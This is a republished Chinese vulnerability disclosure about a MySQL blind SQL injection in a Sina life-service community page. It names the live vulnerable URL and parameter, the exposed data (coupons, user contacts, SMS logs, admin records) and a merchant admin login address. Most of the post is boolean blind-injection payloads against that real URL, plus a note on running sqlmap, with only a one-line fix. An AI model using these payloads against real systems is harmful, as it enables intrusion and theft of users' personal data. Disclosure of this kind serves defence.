欢迎您访问程序员文章站本站旨在为大家提供分享程序员计算机编程知识!
您现在的位置是: 首页  >  网络运营

新浪生活服务互动社区Mysql盲注漏洞的介绍及其修复方法(图解)

程序员文章站 2022-07-03 09:59:31
Mysql盲注漏洞,做网站的要关注哦... 12-06-01...
注入漏洞存在地址为
http://life.sina.com.cn/act/cgi/mother/md?uid=1464029310
其中该漏洞可以导致数据泄漏,其中泄漏的数据包括团购,优惠券、以及用户联系方式,smslog,团购商户、admin等数据。
 
同时,团购的商户登陆地址为
http://life.sina.com.cn/tuanadmin
 
漏洞证明:下面为手工猜解数据库名的语句为
http://life.sina.com.cn/act/cgi/mother/md?uid=1464029310 and length((database()))<5
http://life.sina.com.cn/act/cgi/mother/md?uid=1464029310 and ascii(substring((database()),1,1))=108
http://life.sina.com.cn/act/cgi/mother/md?uid=1464029310 and ascii(substring((database()),1,1))=105
http://life.sina.com.cn/act/cgi/mother/md?uid=1464029310 and ascii(substring((database()),1,1))=102
http://life.sina.com.cn/act/cgi/mother/md?uid=1464029310 and ascii(substring((database()),1,1))=101
下图为注入是返回对正确与错误的截图
 
 新浪生活服务互动社区Mysql盲注漏洞的介绍及其修复方法(图解)
 
注入返回对的情况截图
 
 新浪生活服务互动社区Mysql盲注漏洞的介绍及其修复方法(图解)
 
注入时返回错的情况截图
 
一下是使用sqlmap对注入点进行注入攻击,一下该例为查询数据库banner,通过改变命令参数可以对其进行更深入的攻击。
 
新浪生活服务互动社区Mysql盲注漏洞的介绍及其修复方法(图解)
 
修复方案:

对其uid参数进行检查并且进行过滤。
 
作者 insight-labs